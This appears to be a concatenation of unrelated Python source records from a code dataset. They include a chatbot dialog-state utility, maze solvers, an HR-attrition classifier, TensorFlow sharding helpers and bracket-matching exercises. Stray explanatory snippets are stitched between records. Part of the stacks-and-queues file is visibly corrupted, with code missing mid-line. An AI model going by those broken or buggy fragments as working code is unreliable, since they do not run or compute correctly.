= prefilename + mid\n filepath = fileroute + filename\n tstamp = calendar.timegm(datetime.now().timetuple())\n #確認檔案是否存在\n if os.path.isfile(filepath):\n #print u'有檔案'.encode('utf-8')\n print (u'有檔案')\n with open(filepath) as msgkeep:\n jdata = json.load(msgkeep)\n stepcnt = jdata['nowstep']\n \n jdata['timestamp'] = tstamp\n talk = jdata['step' + str(stepcnt)]\n if way == 'ask':\n \n stepcnt = stepcnt + 1\n jdata['step' + str(stepcnt)] = {}\n jdata['step' + str(stepcnt)]['ask'] = mtext\n #print 'ask:' + mtext.encode('utf-8')\n else: #reply\n talk['reply'] = mtext\n #print 'reply:' + mtext.encode('utf-8')\n \n jdata['nowstep'] = stepcnt\n \n with open(filepath, 'w+') as msgwrite:\n #msgwrite.write(json.dumps(jdata,encoding=\"UTF-8\", ensure_ascii=False).encode('utf-8'))\n msgwrite.write(json.dumps(jdata))\n 
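`standardize_column_name` in the clean_data record above maps quarter digits to the first month of the quarter (q1 -> 0101, q2 -> 0401, q3 -> 0701, q4 -> 1001) through an elif chain; the same mapping collapses to a lookup table:

```python
QUARTER_START = {'1': '0101', '2': '0401', '3': '0701', '4': '1001'}

def quarter_suffix(q_digit):
    # MMDD of the quarter's first month, or None for an unknown digit.
    return QUARTER_START.get(q_digit)

assert quarter_suffix('3') == '0701'
assert quarter_suffix('5') is None
```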
msgwrite.close()\n \n else:\n #print u'沒檔案'.encode('utf-8')\n print (u'沒檔案')\n step = 0\n msgkeep = {}\n msgkeep['timestamp'] = tstamp\n msgkeep['nowstep'] = step\n msgkeep['step' + str(step)] = {}\n msgkeep['step' + str(step)]['ask'] = mtext\n #print 'ask:' + mtext.encode('utf-8')\n \n file = open(filepath , 'w+')\n file.write(json.dumps(msgkeep))\n file.close()\n\ndef CheckStep(mid=''):\n purporse = ''\n step = 0\n last_ask = ''\n timestamp = 0\n last_reply=''\n\n filename = prefilename + mid\n print (filename)\n #filepath = './' + djangoSettings.STATIC_URL + '/bot/' + filename\n filepath = fileroute + filename\n print (filepath)\n \n #先確認檔案是否存在\n if os.path.exists(filepath):\n with open(filepath) as json_data:\n data= json.load(json_data)\n step = data['nowstep']\n purporse = data['step0']['ask']\n if step == 0:\n last_ask = data['step' + str(step)]['ask']\n #last_reply = data['step' + str(step)]['reply']\n else:\n last_ask = data['step' + str(step - 1)]['ask']\n last_reply = data['step' + str(step - 1)]['reply']\n timestamp = data['timestamp']\n \n return purporse,step,last_ask,last_reply,timestamp\n\ndef CheckDialog(mid):\n filepath = fileroute + prefilename + mid\n if os.path.isfile(filepath):\n return True\n \n\ndef RemoveDialog(mid):\n filepath = fileroute + prefilename + mid\n os.remove(filepath)\n\n\ndef chkDict(dict={},key=''):\n try:\n x = dict[key]\n return True\n except KeyError:\n return False\n\ndef isfloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\ndef isint(value):\n try:\n int(value)\n return True\n except ValueError:\n return False\n\n\n\ndef writelog(logstr):\n if oper_para.objects.get(name='DebugMode').content != 'Y':\n return\n\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n sh = logging.StreamHandler()\n fh = logging.FileHandler(fileroute + '\\\\test.log')\n fh.setLevel(logging.DEBUG)\n sh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n sh.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(sh)\n logger.info(logstr + '
')\n logger.removeHandler(sh)\n logger.removeHandler(fh)\n\ndef clearlog():\n if oper_para.objects.get(name='DebugMode').content != 'Y':\n return 'debug mode is closed'\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n sh = logging.StreamHandler()\n fh = logging.FileHandler(fileroute + '\\\\test.log',mode = 'w+')\n fh.setLevel(logging.DEBUG)\n sh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n sh.setFormatter(formatter)\n logger.addHandler(fh)\n logger.addHandler(sh)\n logger.info('log restarted
')\n logger.removeHandler(sh)\n logger.removeHandler(fh)\n return 'log cleared'\n \n \n\ndef getGlShortUrl(longrul):\n import requests\n import json\n strurl = 'https://www.googleapis.com/urlshortener/v1/url?key=' + oper_para.objects.get(name='GoogleShortUrlApiKey').content\n header= {\n \"Content-Type\":\"application/json\"\n }\n payload = {\"longUrl\": longrul}\n \n res = requests.post(strurl,headers = header,data=json.dumps(payload))\n return json.loads(res.text)['id']\n\ndef readlog():\n if oper_para.objects.get(name='DebugMode').content != 'Y':\n return 'debug mode is closed'\n try:\n logcontent = open (fileroute + '\\\\test.log','r')\n except FileNotFoundError:\n return 'log file not found'\n\n return logcontent.read()\n ","sub_path":"inbot/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"634685458","text":"#define a maze by list\n#5 means the wall \n#start postion is left up most pos.\n#target /gaol is right bottom most pos.\n#aim : to find the way from the start pos to goal by DFS & BFS\nimport sys\n#kp_maze = [[0,0,5,5,5,5],[5,0,5,0,0,5],[5,0,0,0,5,5],[5,0,5,0,5,5],[5,0,5,0,0,0],[5,5,5,5,5,0]]\n#kp_maze = [[0,5,5,5,5,5],[0,0,5,0,0,5],[5,0,5,0,5,5],[5,0,5,0,5,5],[5,0,0,0,5,5],[5,5,5,0,0,0]]\n#kp_maze = [[0,0,5,0,0,0],[5,0,5,0,5,0],[5,0,5,0,5,0],[5,0,0,0,5,0],[5,0,5,5,5,0],[5,0,0,0,5,0]]\nkp_maze = [[5,5,5,5,0,0],[5,0,0,0,5,5],[5,0,5,0,0,5],[5,0,0,5,0,5],[5,5,5,0,0,0],[0,0,5,0,5,0]]\n\n# pending feature \n#============================================#\n# expand the size of the maze \n# what would happen if there is no way out ?\n# generating the maze automatedly\n#\n#============================================#\n\n'''\nclass create_maze():\n\tdef __init__(self):\n\t\tpass\n\tdef choose_maze(self,opt):\n\t\tif opt == 1:\n\t\t\treturn [[0,0,5,5,5,5],[5,0,5,0,0,5],[5,0,0,0,5,5],[5,0,5,0,5,5],[5,0,5,0,0,0],[5,5,5,5,5,0]]\n\t\telif opt==2 :\n\t\t\treturn [[0,5,5,5,5,5],[0,0,5,0,0,5],[5,0,5,0,5,5],[5,0,5,0,5,5],[5,0,0,0,5,5],[5,5,5,0,0,0]]\n\t\telif opt==3 :\n\t\t\treturn [[0,5,5,5,5,5],[0,0,5,0,0,5],[5,0,5,0,5,5],[5,0,5,0,5,5],[5,0,0,0,5,5],[5,5,5,0,0,0]]\n\t\telse:\n\t\t\tpass\n'''\n\ndirection = {'W':(-1,0),'S':(0,1),'E':(1,0),'N':(0,-1)}\nDir = ['W','S','E','N']\nDEFAULT_CELL = [0,0] # (visited,direction)\nstart_pos = 20\ntarget_pos = 35\n\nclass solve_maze():\n\tdef __init__(self):\n\t\tself.w_maze = 6\n\t\tself.h_maze = 6\n\t\ttotal_cells = self.w_maze * self.h_maze\n\t\tself.maze_array = [DEFAULT_CELL]*total_cells\n\t\tself.curr_pos = 0\n\t\tself.step_n = 0 \n\tdef dfs_solver(self,maze,start_pos,target_pos):\n\t\tself.Que = []\n\t\tself.curr_pos = start_pos\n\t\tself.Que.append(self.curr_pos)\n\t\tself.maze_array[self.curr_pos] = [1,0]\n\t\tfor kk in range(50):\n\t\t\tif not self.check_if_exit(self.curr_pos):\t\t\n\t\t#while self.check_if_exit() == 0:\n\t\t\t\tself.cell_neighbor(self.curr_pos)\n\t\t\tself.show_state()\n\n\tdef solution_array(self):\n\t\tpass\n\t\n\tdef cell_neighbor(self,cell):\n\t\tcurr_x , curr_y = self.cell_x_y(cell)\n\t\tind = 0\n\t\tfor i in Dir:\n\t\t\tnew_x = curr_x + direction[i][0]\n\t\t\tnew_y = curr_y + direction[i][1]\n\t\t\tprint((curr_x,curr_y),'->',(new_x,new_y))\n\t\t\tif (new_x >=0) & (new_x < self.w_maze):\n\t\t\t\tif (new_y >=0 ) & (new_y< self.h_maze):\t\t\n\t\t\t\t\tnew_cell = self.x_y_cell(new_x,new_y)\n\t\t\t\t\tif not self.visited_cell(new_cell):\n\t\t\t\t\t\t#print('new cell is ', 
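`writelog` in the utility record above builds and attaches a fresh `StreamHandler` and `FileHandler` on every call and then removes them again; if a removal is ever skipped, messages start duplicating and file handles leak. A minimal sketch of the configure-once alternative (the log path is illustrative):

```python
import logging

logger = logging.getLogger('inbot')
if not logger.handlers:  # configure once at import, not on every call
    logger.setLevel(logging.DEBUG)
    fh = logging.FileHandler('test.log')  # illustrative path
    fh.setFormatter(logging.Formatter(
        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
    logger.addHandler(fh)

def writelog(logstr):
    # Handlers persist across calls, so nothing is re-attached or leaked.
    logger.info(logstr)
```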
(new_cell,new_x,new_y))\t\n\t\t\t\t\t\t#print('new cell value is ' ,kp_maze[new_x][new_y])\t\t\n\t\t\t\t\t\tif kp_maze[new_x][new_y] == 0: # there is not a wall\n\t\t\t\t\t\t\tself.Que.append(new_cell)\t\n\t\t\t\t\t\t\tself.step_n += 1\n\t\t\t\t\t\t\tind = 1\t\t\t\t\t\t\n\t\t\t\t\t\t\tself.go_to_cell(cell,new_cell)\t\n\t\t\t\t\t\t\t\n\t\tif \tind ==0 :\n\t\t\t# stack is empty\n\t\t\tprint('there is no way to go')\n\t\t\tprint('from %d to %d' % (cell,self.Que[-1]))\n\t\t\tself.Que.pop(-1)\t\t\t\n\t\t\tself.go_to_cell(cell,self.Que[-1])\t\n\t\t\t\n\n\tdef cell_x_y(self,cell): #confirmed\n\t\ty = cell % self.w_maze\n\t\tx = cell // self.w_maze\n\t\treturn x,y\n\tdef x_y_cell(self,x,y): #confirmed\n\t\treturn 6*x+y\n\n\tdef visited_cell(self,cell):\n\t\tif self.maze_array[cell][0] == 1: #visited\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\tdef go_to_cell(self,from_cell,to_cell):\n\t\tprint('========')\n\t\tprint('into go_to_cell function')\n\t\tprint('go to cell %d' % (to_cell))\n\t\tself.maze_array[to_cell] = [1,0]\n\t\tif to_cell - from_cell == 1:\n\t\t\tself.maze_array[from_cell] = [1,Dir[2]]\n\t\telif to_cell-from_cell == 6:\n\t\t\tself.maze_array[from_cell] = [1,Dir[1]]\n\t\telif to_cell-from_cell == -6:\n\t\t\tself.maze_array[from_cell] = [1,Dir[3]]\n\t\telif to_cell-from_cell == -1:\n\t\t\tself.maze_array[from_cell] = [1,Dir[0]]\n\t\telse:\n\t\t\tprint('something wrong!')\n\t\tself.curr_pos = to_cell\n\n\tdef show_state(self):\n\t\tprint('current pos',self.curr_pos)\n\t\tprint('stack',self.Que)\n\t\n\tdef check_if_exit(self,cell):\n\t\tprint('into check if exit')\n\t\tif cell == target_pos:\n\t\t\tprint('Congradulation!')\n\t\t\tself.solution_array\n\t\t\tsys.exit()\n\t\telse:\n\t\t\tprint('Current pos: %d' % (self.curr_pos))\n\t\t\tprint('keep going!')\n\t\t\treturn 0\n\t\t\n\ndef main():\n\tcurrent_maze = solve_maze()\t \n\tcurrent_maze.dfs_solver(kp_maze,start_pos,target_pos)\n\n\t\nif __name__ == '__main__':\n\tmain()\n","sub_path":"練習/path finding/maze/DFS_Solver.py","file_name":"DFS_Solver.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"346807343","text":"class GEItem:\n def __init__(self, id = -1, name = None, members = None, price = None, highAlch = None, buyLimit = None, noteable = None, tradeable_on_ge = None, stackable = None, timestamp = None):\n self.id = id\n self.name = name\n self.members = members\n self.price = price\n self.highAlch = highAlch\n self.buyLimit = buyLimit\n self.noteable = noteable\n self.tradeable_on_ge = tradeable_on_ge\n self.stackable = stackable\n self.timestamp = timestamp\n\n def __str__(self):\n return str(self.name) + \" \" + str(self.tradeable_on_ge)","sub_path":"GEItem.py","file_name":"GEItem.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"137033808","text":"# https://developers.google.com/classroom/quickstart/python\n# pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\n\n\n# inputs: none\n# output: service object for Google classroom\ndef generate_classroom_credential():\n import pickle\n import os.path\n from googleapiclient.discovery import build\n from google_auth_oauthlib.flow import InstalledAppFlow\n from google.auth.transport.requests import Request\n import httplib2\n\n scopes = ['https://www.googleapis.com/auth/classroom.announcements',\n 'https://www.googleapis.com/auth/classroom.courses',\n 
'https://www.googleapis.com/auth/classroom.coursework.students',\n 'https://www.googleapis.com/auth/classroom.rosters',\n 'https://www.googleapis.com/auth/classroom.topics',\n 'https://www.googleapis.com/auth/classroom.courseworkmaterials',\n 'https://www.googleapis.com/auth/classroom.profile.emails',\n 'https://www.googleapis.com/auth/classroom.guardianlinks.students.readonly',\n ]\n\n\n creds = None\n # The file token_classroom.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token_classroom.pickle'):\n with open('token_classroom.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('credentials_classroom.json', scopes)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open('token_classroom.pickle', 'wb') as token:\n pickle.dump(creds, token)\n try:\n service = build('classroom', 'v1', credentials=creds)\n except httplib2.ServerNotFoundError:\n raise Exception(\"Could not reach Google's servers to create a Google CLASSROOM service object. Internet down?\"\n \"Google down? Your DNS not working?\")\n print(\"Google classroom service object generated\")\n return service\n\n","sub_path":"generate_classroom_credential.py","file_name":"generate_classroom_credential.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"122548732","text":"from ..views import (JudgeListView, JudgeCreateView, \n JudgeUpdateView, JudgeDeleteView, JudgeDeleteAllView)\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import re_path\n\nurlpatterns = [\n re_path(r'^create/(?P\\d+)/$',\n login_required(JudgeCreateView.as_view()),\n name=\"judge_create\"),\n\n re_path(r'^(?P\\d+)/update/$',\n login_required(JudgeUpdateView.as_view()),\n name=\"judge_update\"),\n\n re_path(r'^(?P\\d+)/delete/$',\n login_required(JudgeDeleteView.as_view()),\n name=\"judge_delete\"),\n \n re_path(r'^delete/$',\n login_required(JudgeDeleteAllView.as_view()),\n name=\"judge_delete_all\"),\n\n re_path(r'^$',\n JudgeListView.as_view(),\n name=\"judge_list\"),\n]\n","sub_path":"core/urls/judge_urls.py","file_name":"judge_urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"57326646","text":"import numpy as np\nfrom pylab import *\nimport myrandom\n\n\n\n\ntlen = 100\ndt = 0.1\nxmean = 50.0\nxvar = 3\nxsd = np.sqrt(xvar)\n\nt = np.arange(0,tlen+dt,dt)\n\n\nn = t.shape[0]\nx = myrandom.normdis( n,xmean, xsd )\n\nplot(t,x)\n\n\nvarxnew = np.var(x)\nmeanxnew = np.mean(x)\n\nfracvar = varxnew / (meanxnew*meanxnew)\nfracsd = np.sqrt(fracvar)\n\n\nshow()","sub_path":"pythontests/testfracvar.py","file_name":"testfracvar.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"27193355","text":"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom datetime import datetime\nfrom sklearn.model_selection import 
train_test_split\n\n\ndf = pd.read_csv('attrition_train.csv', index_col=0)\nprint(df.head(1))\n\n# We can see that the dataset consists of 35 attributes, with Attrition as the target variable.\n# First we need to fill in the null values in the dataset...\n\ncategorical_cols = ['Department', 'EducationField', 'Gender', 'JobRole', 'MaritalStatus', 'OverTime', 'Over18', 'BusinessTravel', 'Education', 'EnvironmentSatisfaction', 'JobInvolvement', 'JobLevel', 'JobSatisfaction', 'PerformanceRating', 'RelationshipSatisfaction', 'StockOptionLevel', 'WorkLifeBalance', 'Attrition']\ndf = df.fillna(df.mode().iloc[0])\n\n# All null values in the categorical columns are filled with the most frequent value of that column\n\nnumerical_cols = ['DailyRate', 'DistanceFromHome', 'EmployeeCount', 'EmployeeNumber', 'HourlyRate', 'MonthlyIncome', 'MonthlyRate', 'NumCompaniesWorked', 'PercentSalaryHike', 'StandardHours','TotalWorkingYears', 'TrainingTimesLastYear', 'YearsAtCompany', 'YearsInCurrentRole', 'YearsSinceLastPromotion', 'YearsWithCurrManager']\ndf = df.fillna(df.mean())\n\n# onehot encoding\nto_onehot_encode_cols = ['Department', 'EducationField', 'Gender', 'JobRole', 'MaritalStatus', 'OverTime', 'Over18']\ndf = pd.get_dummies(df, columns=to_onehot_encode_cols)\n\n# convert the BirthDate column into age in years:\ndf['Age'] = df['BirthDate'].map(lambda x: abs((datetime.now() - datetime.strptime(x, '%Y-%m-%d')).days) / 365)\ndf = df.drop('BirthDate', axis=1)\n\nto_encode_cols = {\n    'BusinessTravel': ['Non-Travel', 'Travel_Frequently', 'Travel_Rarely'],\n    'Education': ['1', '2', '3', 'Master', 'Doctor'],\n    'EnvironmentSatisfaction': ['1', 'Medium', '3', '4'],\n    'JobInvolvement': ['1', '2', 'High', '4'],\n    'JobLevel': ['One', '2', '3', '4', 'Five'],\n    'JobSatisfaction': ['1', '2', '3', 'Very High'],\n    'PerformanceRating': ['Excellent', 'Outstanding'],\n    'RelationshipSatisfaction': ['Low', '2', 'High', '4'],\n    'StockOptionLevel': ['Zero', '1', '2', '3'],\n    'WorkLifeBalance': ['Bad', 'Good', 'Better', 'Best'],\n    'Attrition': ['No', 'Yes']\n}\n\nfor feature, vals in to_encode_cols.items():\n    df[feature] = df[feature].map(lambda x: vals.index(x))\n\n# Separate the target attribute Attrition from the rest of the dataset\nX = df.drop('Attrition', axis=1)\ny = df['Attrition']\n\n# With the missing values filled in, we can move on to training the models\n\nstablo = DecisionTreeClassifier()\nrandom_forest = RandomForestClassifier()\ngbm = GradientBoostingClassifier()\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25)\n\nstablo.fit(X_train, y_train)\nrandom_forest.fit(X_train, y_train)\ngbm.fit(X_train, y_train)\n\nprint(f'Decision tree accuracy (holdout): {stablo.score(X_test, y_test)}')\nprint(f'Random forest accuracy (holdout): {random_forest.score(X_test, y_test)}')\nprint(f'Boosted forest accuracy (holdout): {gbm.score(X_test, y_test)}')\n\n# # We can see that the boosted forest gives the best accuracy, ~ 85%\n\n# A confidence interval is an estimate telling us that a sample drawn from the population will fall within an interval of the population, i.e. based on given population parameters such as the mean or variance\n# we try to determine in which interval the sample mean lies within the population.\n# The p-value is the probability corresponding to the area to the right of a given point of the normal distribution.\n# Positive predictive value is the probability that a randomly chosen sample will be correctly classified as positive.\n# Prevalence is the share of bad classification predictions in the whole population.\n# Detection rate is the ratio of positive instances that are correctly classified to all positives in the population.\n# Detection prevalence is the number of predicted positive samples relative to the whole population.\n# Balanced accuracy is the mean of the per-class accuracies.\n\n","sub_path":"z1.py","file_name":"z1.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"503137350","text":"import time\n\nDESIRED_SAMPLES = 200\nACCEPTED_DIFFERENCE = 1.5\nTIME_TO_START = 20\n\nclass Calibrator():\n    def __init__(self):\n        self._start_time = time.time()\n        self._axes_sums = [None]*3\n        self._samples = 0\n\n    def add_sample(self, sample_data, current_time):\n        if self.ready():\n            return True\n\n        time_elapsed = current_time - self._start_time\n        if time_elapsed < TIME_TO_START:\n            return False\n\n        if self._axes_sums[0] is None:\n            self._axes_sums = [*sample_data]\n            self._samples = 1\n        else:\n            accepted_sample = True\n            for i in range(0, len(self._axes_sums)):\n                average = self._axes_sums[i] / self._samples\n                difference = abs(average - sample_data[i])\n                if difference > ACCEPTED_DIFFERENCE:\n                    accepted_sample = False\n                    break\n\n            if accepted_sample is True:\n                for i in range(0, len(self._axes_sums)):\n                    self._axes_sums[i] += sample_data[i]\n                self._samples += 1\n            else:\n                self._axes_sums = [*sample_data]\n                self._samples = 1\n\n        return self.ready()\n\n    def ready(self):\n        return self._samples >= DESIRED_SAMPLES\n\n    def averages(self):\n        results = []\n        for i in range(0, len(self._axes_sums)):\n            results.append(self._axes_sums[i] / self._samples)\n        return results\n\n    def clear(self):\n        self._start_time = time.time()\n        self._axes_sums = [None]*3\n        self._samples = 0\n","sub_path":"src/system/calibrator.py","file_name":"calibrator.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"520129620","text":"\"\"\"Utilities shared between csrn modules and tf modified ops.\"\"\"\n\nimport json\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.framework import ops\n\n\ndef import_json_config(config_path):\n    \"\"\"Import json configurations.\n    \n    Args:\n        config_path: Absolute path to configuration .json file.\n    \n    Returns:\n        A configuration dictionary.\n\n    Raises:\n        NameError: If the file does not exist.\n    \n    \"\"\"\n    try:\n        with open(config_path) as config_json:\n            config = json.load(config_json)\n            config_json.close()\n            return config\n    except NameError as ex:\n        print(\"Read Error: no file named %s\" % config_path)\n        raise ex\n\n\ndef comp_shard(self, num_shards, index):\n    \"\"\"Creates a `Dataset` that includes (`num_shards`-1)/`num_shards` of this dataset.\n    Complementary to 'shard' method of tf.data.Dataset.\n    Useful when separating an evaluation dataset from the overall set.\n    Should be assigned to the Dataset class like that:\n    \n    ```python\n    import tensorflow as tf\n    tf.data.Dataset.comp_shards = comp_shard\n    ```\n\n    Use Example:\n\n    ```python\n    # d is a dataset containing all samples.\n    d = d.shuffle(FLAGS.shuffle_buffer_size)\n    d = d.repeat(FLAGS.num_epochs)\n    train_dataset = d.shard(10, 0);\n    eval_dataset = 
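The attrition record above fills categorical nulls with `df.fillna(df.mode().iloc[0])`; `df.mode()` returns a DataFrame (ties add extra rows), so `.iloc[0]` selects one mode per column. A tiny demo on made-up data:

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'color': ['red', None, 'red', 'blue'],
                   'size':  [1.0, np.nan, 3.0, np.nan]})

filled = df.fillna(df.mode().iloc[0])   # per-column most frequent value
print(filled['color'].tolist())         # ['red', 'red', 'red', 'blue']
```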
d.comp_shard(10, 0);\n ```\n\n Args:\n num_shards: A `tf.int64` scalar `tf.Tensor`.\n index: A `tf.int64` scalar `tf.Tensor`. Use the same index given to 'shard'\n operation to recieve the correct complementary dataset.\n Returns:\n Dataset: A `Dataset`.\n Raises:\n ValueError: if `num_shards` or `index` are illegal values. Note: error\n checking is done on a best-effort basis, and aren't guaranteed to be\n caught upon dataset creation. (e.g. providing in a placeholder tensor\n bypasses the early checking, and will instead result in an error during\n a session.run call.)\n \n \"\"\"\n num_shards = ops.convert_to_tensor(\n num_shards, name=\"num_shards\", dtype=dtypes.int64)\n num_shards_static = tensor_util.constant_value(num_shards)\n index = ops.convert_to_tensor(index, name=\"index\", dtype=dtypes.int64)\n index_static = tensor_util.constant_value(index)\n\n if num_shards_static is not None and num_shards_static < 1:\n raise ValueError(\"num_shards must be >= 1; got: %s\" % num_shards_static)\n if index_static is not None and index_static < 0:\n raise ValueError(\"index must be >= 0; got: %s\" % index_static)\n if (index_static is not None and num_shards_static is not None and\n index_static >= num_shards_static):\n raise ValueError(\"index must be <= num_shards; %s is not < %s\" %\n (index_static, num_shards_static))\n\n def filter_fn(elem_index, _):\n mod_result = math_ops.mod(elem_index, num_shards)\n return math_ops.not_equal(mod_result, index)\n\n return self._enumerate().filter(filter_fn).map(lambda _, elem: elem)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"474317199","text":"\"\"\"\nThis Python script evaluates the total time taken to execute \"show version\" on 4 network devices:\n- 1 Cisco IOS device\n- 2 Arista EOS devices\n- 1 Juniper SRX device\n\nIt uses Netmiko & the \"ThreadPoolExecutor\" in Concurrent Futures\n\"\"\"\n\nfrom concurrent.futures import ThreadPoolExecutor, as_completed # no longer importing wait timer\nfrom datetime import datetime\nfrom my_devices import device_list\nfrom my_functions import ssh_command2 as ssh_conn\n\n\ndef main():\n command = \"show version\"\n start_time = datetime.now()\n max_threads = 4\n \n pool = ThreadPoolExecutor(max_threads)\n \n future_list = []\n for device in device_list:\n future = pool.submit(ssh_conn, device, command)\n future_list.append(future)\n\n # Process as completed, whichever result is the fastest\n for future in as_completed(future_list):\n print(\"#\" * 30)\n print(\"Result: \" + future.result())\n end_time = datetime.now()\n print(f\"\\nExecution time for result: {end_time - start_time}\")\n\n end_time = datetime.now()\n print(f\"\\nTotal execution time: {end_time - start_time}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ssh_concurrency/ex3b.py","file_name":"ex3b.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"385434757","text":"from collections import deque\nimport queue\n\nclass MyQueue:\n\n def __init__(self):\n self.front = []\n self.rear = []\n\n def push(self, x: int) -> None:\n self.front.append(x)\n\n def pop(self) -> int:\n if len(self.front)==1:\n return self.front.pop()\n else:\n while len(self.front)>1:\n self.rear.append(self.front.pop())\n return self.front.pop()\n\n def peek(self) -> int:\n if len(self.front)==1:\n return 
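`comp_shard` in the utils record above keeps exactly the elements whose enumeration index is not congruent to `index` modulo `num_shards`, i.e. the complement of `Dataset.shard`. The same filter in plain Python over indices 0-9:

```python
num_shards, index = 10, 0

shard      = [i for i in range(10) if i % num_shards == index]   # Dataset.shard
comp_shard = [i for i in range(10) if i % num_shards != index]   # its complement

assert sorted(shard + comp_shard) == list(range(10))  # disjoint cover of the data
print(shard, comp_shard)   # [0] [1, 2, 3, 4, 5, 6, 7, 8, 9]
```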
self.front[len(self.front)-1]\n else:\n return self.rear[len(self.rear)-1]\n\n def empty(self) -> bool:\n return len(self.front)<1\ndef longestValidParentheses( s: str) -> int:\n stack = deque()\n current=0;maxValid=0\n for e in s:\n if e == '(':\n stack.append('(')\n elif e == ')':\n if stack:\n ch = stack.pop()\n if ch == '(':\n current+=2\n if maxValid<=current:\n maxValid=current\n\n else:\n stack.append('(')\n else:\n current=0\n return maxValid\n\ndef myQueue():\n c = queue.Queue()\n c.put(\"first\",block=True,timeout=0.5)\n c.put(\"second\")\n print(c.get())\n print(c.get())\n print(c.empty())\n \n print(c.get(timeout=1))\n a = deque()\n a.append(1)\n a.append(2)\n print(a.pop())\n print(a.pop())\n print(a.pop())\n\ndef balancedBrackets(string):\n # Write your code here.\n stack = []\n balanced = False\n top = None\n for e in string:\n symbols = ['(','[','{']\n closing = [')',']','}']\n if e in symbols:\n stack.append(e)\n else:\n if len(stack)==0:\n balanced = False\n elif e in closing:\n top = stack.pop()\n if not matches(top,e):\n return False\n else:\n balanced = True\n return balanced and len(stack)==0\n\ndef matches(first,second):\n return (first=='(' and second == ')') or (first == '[' and second == ']') or (first == '{' and second == '}')\n\ndef longestBalancedBrackets(s):\n n = len(s)\n stack = []\n count = 0;total=0\n balanced = True\n for e in s:\n if e == '(':\n stack.append('(')\n else:\n if len(stack)==0:\n\n balanced = False\n\n else:\n top = stack.pop()\n if top == '(':\n count+=2\n balanced = True\n if total int:\n l=r=c=0\n for i in range(len(s)):\n if s[i]=='(':\n l+=1\n else:\n r+=1\n if l==r:\n c=max(c,l+r)\n elif lr:\n l=r=0\n return c\ndef nextGreaterElement(array):\n # Write your code here.\n stack = []\n n = len(array)\n\n return []\nif __name__ == '__main__':\n\n s = \"(a)\"\n print(balancedBrackets(s))\n s1 = \")()()()(((((((()))\"\n print(longestValidParentheses(s1))\n print(longestBalancedBrackets(s1))\n sol = Solution()\n print(sol.longestValidParentheses(s1))\n","sub_path":"Algorithms/HundredDaysOfCode/StacksAndQueues.py","file_name":"StacksAndQueues.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"186803233","text":"import queue\n\nimport numpy\n\n\nclass HitError(ValueError):\n pass\n\n\nclass WallHitError(HitError):\n pass\n\n\nclass BorderHitError(HitError):\n pass\n\n\nIS_TARGET = 1\nWALL_LEFT = 2\nWALL_UP = 4\n\n\ndef up(maze, loc, check_walls=True):\n if loc[0] == 0:\n raise BorderHitError\n if check_walls and maze[loc] & WALL_UP:\n raise WallHitError\n return loc[0] - 1, loc[1]\n\n\ndef down(maze, loc, check_walls=True):\n if loc[0] == (maze.shape[0] - 1):\n raise BorderHitError\n newloc = loc[0] + 1, loc[1]\n if check_walls and maze[newloc] & WALL_UP:\n raise WallHitError\n return newloc\n\n\ndef left(maze, loc, check_walls=True):\n if loc[1] == 0:\n raise BorderHitError\n if check_walls and maze[loc] & WALL_LEFT:\n raise WallHitError\n return loc[0], loc[1] - 1\n\n\ndef right(maze, loc, check_walls=True):\n if loc[1] == (maze.shape[1] - 1):\n raise BorderHitError\n newloc = loc[0], loc[1] + 1\n if check_walls and 